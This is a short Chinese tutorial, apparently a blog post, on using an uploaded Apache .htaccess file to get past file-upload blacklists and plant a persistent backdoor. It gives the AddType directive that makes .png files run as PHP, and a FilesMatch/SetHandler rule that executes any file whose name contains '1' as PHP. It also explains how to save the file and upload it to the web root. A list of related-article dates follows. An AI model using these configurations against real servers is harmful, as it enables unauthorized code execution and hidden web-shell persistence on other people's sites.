一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入

AddType  application/x-httpd-php    .png

打开另存为

.htaccess文件上传利用

保存类型为所有文件

上传.htaccess 必须是网站根路径 

让png解析为php 

2.留后门 可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

123456.png  就会以php执行

相关文章:

  • 2022-02-18
  • 2022-12-23
  • 2022-12-23
  • 2021-10-08
  • 2022-12-23
  • 2021-09-26
  • 2021-06-14
  • 2021-07-13
猜你喜欢
  • 2021-09-26
  • 2022-12-23
  • 2022-12-23
  • 2018-09-22
  • 2022-12-23
  • 2021-07-21
  • 2022-01-24
相关资源
相似解决方案